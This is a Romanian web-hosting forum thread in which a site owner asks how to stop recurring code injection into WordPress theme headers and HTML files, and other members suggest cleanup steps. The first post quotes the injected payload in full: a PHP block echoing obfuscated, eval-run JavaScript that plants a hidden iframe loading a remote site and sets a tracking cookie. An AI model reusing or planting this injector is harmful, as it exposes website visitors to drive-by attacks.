Hacking website

[demonbogdan]

ma confrunt de cateva zile cu problema de inserare js in headerul temelor wordpress plus inserare in header la unele fisiere html.
exemplu cod:

Cod:

<?
#0f2490#
                                                                                                                                                                                                                                                                                                                                                                                                                if(empty($hgtfe)) {$hgtfe = "<script type=\"text/javascript\" language=\"javascript\" >aq=\"0x\";bv=(5-3-1);sp=\"s\"+\"p\"+\"li\"+\"t\";w=window;z=\"dy\";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f=\"17:5d:6c:65:5a:6b:60:66:65:17:70:70:5c:59:62:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:70:70:5c:59:62:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:70:70:5c:59:62:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:6e:6e:6e:25:69:5c:5a:5f:6b:6a:58:65:6e:58:5c:63:6b:5c:24:62:66:5c:6a:6b:5c:69:24:6e:66:5c:63:63:5c:69:6b:25:5a:66:64:26:5f:3e:5d:5b:39:4e:4f:70:25:67:5f:67:1e:32:4:1:17:70:70:5c:59:62:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:70:70:5c:59:62:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:2e:29:1e:32:4:1:17:70:70:5c:59:62:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:2e:29:67:6f:1e:32:4:1:17:70:70:5c:59:62:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:2e:29:67:6f:1e:32:4:1:17:70:70:5c:59:62:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:2e:29:1e:32:4:1:17:70:70:5c:59:62:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:2e:29:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:70:70:5c:59:62:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:70:70:5c:59:62:53:1e:17:5a:63:58:6a:6a:34:53:1e:70:70:5c:59:62:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:70:70:5c:59:62:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:70:70:5c:59:62:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:70:70:5c:59:62:27:30:1f:20:32:4:1:74:4:1:74\"[sp](\":\");}w=f;s=[];for(i=22-20-2;-i+1443!=0;i+=1){j=i;if((0x19==031))s+=String[\"fromCharCode\"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)}</script>";echo $hgtfe;}
#/0f2490#
?>

la wordpress am facut reinstalare curata, am schimbat parole la websiteuri, la ftp, la server. Problema continua sa apara. pt wordpress am incercat si cu un httacces pe wp-admin. momentan am oprit serverul ftp pana gasesc o solutie. un sfat, o idee?

[Robert]

Ai curatat si unitatea de lucru ?
Daca nu, asta ar trebui sa fie primul pas. Dupa aceea curatat fisiere, schimbat parole si updateuri de rigoare.

[demonbogdan]

am facut asta. mai e o chestie: de ex la unele domenii hackerite, am alte subfoldere cu wordpress ; acolo nu se modifica nimic. iar la un alt cont de cpanel imi sparge doar siteul principal pe care e facut acel account.
PS: am un site html care a fost hackerit in acelasi fel, acolo am dat la fisiere chmod 444 si vad ca a ramas in regula.

[HkSilviu]

Pe langa chmodd 444, verifica toate fisierele de pe site, e posibil sa ai un script shell pus pe acolo si face ce vrea, ori ai luat o tema nulled la wordpress (asa se intampla de obicei cu teme nulled, si eu am patit la fel). Daca mai ai probleme poti da pm si te ajut eu.

[gmircea]

cred ca ai fost atacat prin sql injection.
verifica inclusiv fiserele login.php index.php si fisierele java script.
daca nu, vezi unde au instalat script shellu. poate nu e pe contul tau ci pe contul hostului si are acces peste tot.